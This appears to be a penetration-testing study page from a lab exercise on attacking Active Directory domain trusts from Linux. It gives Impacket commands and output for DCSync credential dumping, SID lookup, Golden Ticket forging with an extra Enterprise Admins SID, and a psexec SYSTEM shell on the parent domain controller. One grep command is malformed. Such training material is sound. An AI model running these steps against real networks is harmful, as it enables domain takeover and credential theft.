🐧Attacking Domain Trusts From Linux

Just like with Windows, we can launch similar attacks from Linux.

We start by gathering the following information again

  • The KRBTGT hash for the child domain

  • The SID for the child domain

  • The name of a target user in the child domain

  • The FQDN of the child domain

  • The SID of the Enterprise Admins group of the root domain

Performing DCSync with secretsdump.py

Once we have control of the child domain, we can run a DCSync to grab the NTLM hash of the KRBTGT account.

secretsdump.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 -just-dc-user LOGISTICS/krbtgt
*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9d765b482771505cbe97411065964d5f:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:d9a2d6659c2a182bc93913bbfa90ecbead94d49dad64d23996724390cb833fb8
krbtgt:aes128-cts-hmac-sha1-96:ca289e175c372cebd18083983f88c03e
krbtgt:des-cbc-md5:fee04c3d026d7538
[*] Cleaning up...

Performing SID Brute Force using lookupsid.py

We can now try to use SID brute forcing to find the SID of the child domain. 

lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240

Looking for the Domain SID

We can refine this further by piping it to grep with the "Domain SID" string

grep | "Domain SID"

Grabbing the Domain SID & Attacking to Enterprise Admin's RID

We can rerun the command and grab the domain SID 

lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.5 | grep -B12 "Enterprise Admins"

Constructing a Golden Ticket using ticketer.py

We can now use ticketer.py to construct a Golden Ticket, this will be valid to access resources in the child domain. This ticket will be saved in a ccache file, which Kerberos can use to hold credentials.

ticketer.py -nthash 9d765b482771505cbe97411065964d5f -domain LOGISTICS.INLANEFREIGHT.LOCAL -domain-sid S-1-5-21-2806153819-209893948-922872689 -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 tommy

Setting the KRB5CCNAME Env Variable

We make sure to set the ccache file in our env variable

export KRB5CCNAME=hacker.ccache

Getting a SYSTEM shell using Impacket

We should now be able to psexec.py to authenticate to the parents DC, and drop us into a SYSTEM shell

psexec.py LOGISTICS.INLANEFREIGHT.LOCAL/tommy@academy-ea-dc01.inlanefreight.local -k -no-pass -target-ip 172.16.5.5

C:\Windows\system32> whoami
nt authority\system

Performing the Attack with raiseChild.py

We can also perform the same attack with raiseChiled.py. It can automate escalating from child to parent domain. It will work as follows.

  • Obtains the SID for the Enterprise Admins group of the parent domain

  • Retrieves the hash for the KRBTGT account in the child domain

  • Creates a Golden Ticket

  • Logs into the parent domain

  • Retrieves credentials for the Administrator account in the parent domain

raiseChild.py -target-exec 172.16.5.5 LOGISTICS.INLANEFREIGHT.LOCAL/htb-student_adm

We should be very careful using "autopwn" scripts during real engagements!

PreviousAttacking Domain Trusts From WindowsNextCross-Forest Trust Abuse From Windows

Last updated

Was this helpful?